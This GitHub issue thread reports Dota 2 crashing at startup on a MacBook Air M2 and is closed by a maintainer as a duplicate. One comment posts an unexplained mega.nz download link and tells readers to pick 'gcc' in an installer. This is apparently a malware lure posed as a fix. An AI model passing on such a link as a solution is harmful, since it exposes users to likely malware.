### ISSUE TITLE
Dota 2 keeps crashing during the startup after the latest big update

### ISSUE THREAD

**Issue by 12ilazor** [ValveSoftware/Dota-2#2793]
#### Your system information

* System information from steam (`Steam` -> `Help` -> `System Information`) in a [gist](https://gist.github.com/):

* Have you checked for system updates?: [Yes]
* Are you using the latest stable video driver available for your system? [Yes]
* Have you verified the game files?: [Yes]

#### Please describe your issue in as much detail as possible:
Describe what you _expected_ should happen and what _did_ happen. Please link any large pastes as a [Github Gist](https://gist.github.com/).

#### Steps for reproducing this issue:

1. Startup Dota 2 from Macbook Air m2 using Steam
2. It Crashes, quits a game and shows a popup with Error 24 message
3. When you click Reopen the Game seems to be working but sometime it might crash 3-4 times at the startup

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by kisak-valve** [comment]
Hello @12ilazor, this issue is already being tracked at #2784.

Closing as a duplicate.
